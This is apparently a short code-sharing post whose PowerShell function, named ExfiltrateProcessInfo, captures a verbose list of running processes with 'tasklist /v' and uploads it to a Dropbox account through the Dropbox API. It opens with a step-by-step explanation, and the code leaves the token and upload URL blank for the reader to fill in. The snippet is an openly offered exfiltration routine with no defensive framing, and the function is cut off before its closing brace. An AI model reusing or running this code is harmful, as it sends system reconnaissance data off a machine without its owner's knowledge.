
36 lines
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This function uploads the content of a file called "tasklist_output.txt" to Dropbox using Dropbox API.
Firstly, a temporary file is created using the New-TemporaryFile cmdlet of PowerShell.
Then, the tasklist /v command is used to get the running processes output on the computer.
The output is then written to the temporary file using the Out-File cmdlet.
The Dropbox API endpoint for uploading a file is set, and the API parameters such as the destination path of the file on Dropbox and access credentials are specified.
Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST request to the Dropbox API and upload the file.
function ExfiltrateProcessInfo {
$localFilePath = New-TemporaryFile
$taskListOutput = tasklist /v
$taskListOutput | Out-File -FilePath $localFilePath
$dropboxFilePath = "/tasklist_output.txt"
# Required - Set here your Dropbox Token
$accessToken = ""
$authHeader = @{Authorization = "Bearer $accessToken"}
$fileContent = Get-Content $localFilePath
$uploadUrl = ""
$headers = @{}
$headers.Add("Authorization", "Bearer $accessToken")
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
$headers.Add("Content-Type", "application/octet-stream")
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent